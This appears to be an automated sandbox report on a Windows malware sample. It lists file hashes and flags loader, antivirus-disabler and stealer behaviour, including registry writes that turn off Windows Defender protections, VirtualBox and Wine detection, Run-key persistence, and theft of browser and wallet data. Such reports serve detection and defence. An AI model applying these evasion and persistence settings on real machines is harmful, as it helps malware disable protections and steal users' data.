SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe

MD5 ebcd88613fed4a2608bc1768817bce4d
SHA1 afbba964372b91250c4c04ec9ee649a36a50b95f
SHA256 124e9553ae88df251e56e6dade1476fec8ef86fd579d978ca3b0d66ca3506a3e
SHA512 45f0bdf0c0c5d63662723110985b5dd7c295f70f79d55080dada64fa8480f074f6c7276f2a8acf712fd5793eabe3be77e2c72470ad282707eface715f1cbd113

memory/2984-1451-0x0000000004240000-0x00000000046F7000-memory.dmp

C:\ProgramData\00z58\yct0hv

MD5 6d9ead954a1d55a4b7b9a23d96bb545e
SHA1 b55a31428681654b9bc4f428fc4c07fa7244760f
SHA256 eab705a4e697fa8c54cdbe7df8d46c679df9878c327a003819bb2bf72d90919c
SHA512 b9422f770aa156c13f63399aae96d750f273a6db7c9177b725660aa236a04ca7c4e3bf64d394de3a1f1ec2ad49b60528023aee37b7c195ed70073c049980a322

memory/764-1457-0x0000000001150000-0x0000000001607000-memory.dmp

memory/2984-1453-0x0000000004240000-0x00000000046F7000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 9b1c99d5245940563e9e81e95c4832ec
SHA1 1bc5970a797d7160879f1ab93559a23b736a2ce7
SHA256 5e5e2d6ab15529a13c5f6fddf4908f82199df64cd0fff65ec624e324f6f20a45
SHA512 6d270d67927d391ddb39f5f2c3bbcbe36add45dc5cbf35099b0876b1b1c91f7ff23389e564bdf583fb4245984cd0a8af8f75ef87695296a8dc1d91269763b957

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000009.dbtmp

MD5 979c29c2917bed63ccf520ece1d18cda
SHA1 65cd81cdce0be04c74222b54d0881d3fdfe4736c
SHA256 b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53
SHA512 e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000010.dbtmp

MD5 60e3f691077715586b918375dd23c6b0
SHA1 476d3eab15649c40c6aebfb6ac2366db50283d1b
SHA256 e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee
SHA512 d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

memory/2280-1516-0x0000000000400000-0x0000000000856000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-02 02:18

Reported

2025-03-02 02:21

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a16b636c8b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062720101\\a16b636c8b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062730121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26d8edfd34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062940101\\26d8edfd34.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f33a39d263.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062950101\\f33a39d263.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d8a752ab6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062960101\\5d8a752ab6.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\108a92f678.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062970101\\108a92f678.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\ntlogsystem.bin C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
